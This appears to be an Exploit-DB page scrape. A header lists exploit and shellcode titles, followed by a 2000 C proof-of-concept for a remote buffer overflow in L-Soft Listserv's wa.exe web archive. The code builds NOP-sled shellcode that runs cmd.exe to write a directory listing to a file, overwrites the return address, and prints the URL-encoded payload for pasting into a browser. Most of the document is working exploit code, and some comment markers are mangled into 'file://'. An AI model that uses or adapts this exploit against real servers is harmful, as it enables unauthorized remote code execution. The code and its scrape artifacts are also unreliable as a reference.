
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
270 lines
No EOL
4.6 KiB
C
270 lines
No EOL
4.6 KiB
C
// source: https://www.securityfocus.com/bid/1167/info
|
|
|
|
The Web Archive component of L-Soft Listserv contains unchecked buffer code exploitable by sending specially crafted requests to the Web Archive. This weakness will allow execution of arbitrary code by remote attackers.
|
|
|
|
/////////////////////////////////////////////////////////////////
|
|
//
|
|
//
|
|
// LSOFT's Listserv web archives wa.exe buffer overflow
|
|
//
|
|
//
|
|
// This is "proof of concept code" and will spawn a shell
|
|
// perform a directory listing and redirect the output
|
|
// to a file called "cerberus.txt". Will work on Windows NT 4
|
|
// SP6a
|
|
//
|
|
//
|
|
// David Litchfield (mnemonix@globalnet.co.uk)
|
|
//
|
|
// 1st May 2000
|
|
//
|
|
//
|
|
// Cut and paste the output into your web browser.
|
|
//
|
|
/////////////////////////////////////////////////////////////////
|
|
|
|
#include <stdio.h>
|
|
int main()
|
|
{
|
|
unsigned char exploit[2000]="";
|
|
int count = 0;
|
|
|
|
while(count <100)
|
|
{
|
|
exploit[count]=0x90;
|
|
count ++;
|
|
}
|
|
|
|
// push ebp
|
|
exploit[count]=0x55;
|
|
count ++;
|
|
|
|
// mov ebp,esp
|
|
exploit[count]=0x8B;
|
|
count ++;
|
|
exploit[count]=0xEC;
|
|
count ++;
|
|
|
|
// mov eax, 0x77f1a986
|
|
exploit[count]=0xb8;
|
|
count ++;
|
|
exploit[count]=0x86;
|
|
count ++;
|
|
exploit[count]=0xa9;
|
|
count ++;
|
|
exploit[count]=0xf1;
|
|
count ++;
|
|
exploit[count]=0x77;
|
|
count ++;
|
|
|
|
// mov ebx, 0xffffffff
|
|
exploit[count]=0xbb;
|
|
count ++;
|
|
exploit[count]=0xff;
|
|
count ++;
|
|
exploit[count]=0xff;
|
|
count ++;
|
|
exploit[count]=0xff;
|
|
count ++;
|
|
exploit[count]=0xff;
|
|
count ++;
|
|
|
|
file://sub ebx, 0xffffff8B
|
|
exploit[count]=0x83;
|
|
count ++;
|
|
exploit[count]=0xeb;
|
|
count ++;
|
|
exploit[count]=0x8B;
|
|
count ++;
|
|
|
|
// push ebx
|
|
exploit[count]=0x53;
|
|
count ++;
|
|
|
|
// push "xt.s"
|
|
exploit[count]=0x68;
|
|
count ++;
|
|
exploit[count]=0x73;
|
|
count ++;
|
|
exploit[count]=0x2e;
|
|
count ++;
|
|
exploit[count]=0x74;
|
|
count ++;
|
|
exploit[count]=0x78;
|
|
count ++;
|
|
|
|
file://push "ureb"
|
|
exploit[count]=0x68;
|
|
count ++;
|
|
exploit[count]=0x62;
|
|
count ++;
|
|
exploit[count]=0x65;
|
|
count ++;
|
|
exploit[count]=0x72;
|
|
count ++;
|
|
exploit[count]=0x75;
|
|
count ++;
|
|
|
|
file://push "rec "
|
|
exploit[count]=0x68;
|
|
count ++;
|
|
exploit[count]=0x20;
|
|
count ++;
|
|
exploit[count]=0x63;
|
|
count ++;
|
|
exploit[count]=0x65;
|
|
count ++;
|
|
exploit[count]=0x72;
|
|
count ++;
|
|
|
|
file://push "> ri"
|
|
exploit[count]=0x68;
|
|
count ++;
|
|
exploit[count]=0x69;
|
|
count ++;
|
|
exploit[count]=0x72;
|
|
count ++;
|
|
exploit[count]=0x20;
|
|
count ++;
|
|
exploit[count]=0x3e;
|
|
count ++;
|
|
|
|
file://push "d c/"
|
|
exploit[count]=0x68;
|
|
count ++;
|
|
exploit[count]=0x2f;
|
|
count ++;
|
|
exploit[count]=0x63;
|
|
count ++;
|
|
exploit[count]=0x20;
|
|
count ++;
|
|
exploit[count]=0x64;
|
|
count ++;
|
|
|
|
file://push " exe"
|
|
exploit[count]=0x68;
|
|
count ++;
|
|
exploit[count]=0x65;
|
|
count ++;
|
|
exploit[count]=0x78;
|
|
count ++;
|
|
exploit[count]=0x65;
|
|
count ++;
|
|
exploit[count]=0x20;
|
|
count ++;
|
|
|
|
|
|
file://push "cmd."
|
|
exploit[count]=0x68;
|
|
count ++;
|
|
exploit[count]=0x63;
|
|
count ++;
|
|
exploit[count]=0x6d;
|
|
count ++;
|
|
exploit[count]=0x64;
|
|
count ++;
|
|
exploit[count]=0x2e;
|
|
count ++;
|
|
|
|
file://mov ebx, esp
|
|
exploit[count]=0x8b;
|
|
count ++;
|
|
exploit[count]=0xdc;
|
|
count ++;
|
|
|
|
file://xor esi, esi
|
|
exploit[count]=0x33;
|
|
count ++;
|
|
exploit[count]=0xf6;
|
|
count ++;
|
|
|
|
file://push esi
|
|
exploit[count]=0x56;
|
|
count ++;
|
|
|
|
file://push ebx
|
|
exploit[count]=0x53;
|
|
count ++;
|
|
|
|
file://call eax
|
|
exploit[count]=0xff;
|
|
count ++;
|
|
exploit[count]=0xd0;
|
|
count ++;
|
|
|
|
// set a break point (int 3)
|
|
while(count <420)
|
|
{
|
|
exploit[count]=0xCC;
|
|
count ++;
|
|
}
|
|
|
|
|
|
// overwrite the return address
|
|
|
|
exploit[count]=0x36;
|
|
count ++;
|
|
exploit[count]=0x28;
|
|
count ++;
|
|
exploit[count]=0xf3;
|
|
count ++;
|
|
exploit[count]=0x77;
|
|
count ++;
|
|
|
|
// put in 40 nops (0x90)
|
|
|
|
while (count < 464)
|
|
{
|
|
exploit[count]=0x90;
|
|
count ++;
|
|
}
|
|
|
|
// write our code that'll get us back into our un-tolower()ed string
|
|
|
|
// move edx, 0xFFFFFFFF
|
|
exploit[count]=0xBA;
|
|
count ++;
|
|
exploit[count]=0xFF;
|
|
count ++;
|
|
exploit[count]=0xFF;
|
|
count ++;
|
|
exploit[count]=0xFF;
|
|
count ++;
|
|
exploit[count]=0xFF;
|
|
count ++;
|
|
|
|
// sub edx, 0xFFDFAC87
|
|
exploit[count]=0x81;
|
|
count ++;
|
|
exploit[count]=0xEA;
|
|
count ++;
|
|
exploit[count]=0x87;
|
|
count ++;
|
|
exploit[count]=0xAC;
|
|
count ++;
|
|
exploit[count]=0xDF;
|
|
count ++;
|
|
exploit[count]=0xFF;
|
|
count ++;
|
|
|
|
// jmp edx
|
|
exploit[count]=0xFF;
|
|
count ++;
|
|
exploit[count]=0xE2;
|
|
count ++;
|
|
|
|
// set readable part in memory to stop first AV
|
|
|
|
exploit[390]=0x36;
|
|
exploit[390]=0xf3;
|
|
exploit[391]=0x77;
|
|
|
|
count = 0;
|
|
while(count < 477)
|
|
{
|
|
printf("%%%x",exploit[count]);
|
|
count ++;
|
|
}
|
|
|
|
return 0;
|
|
} |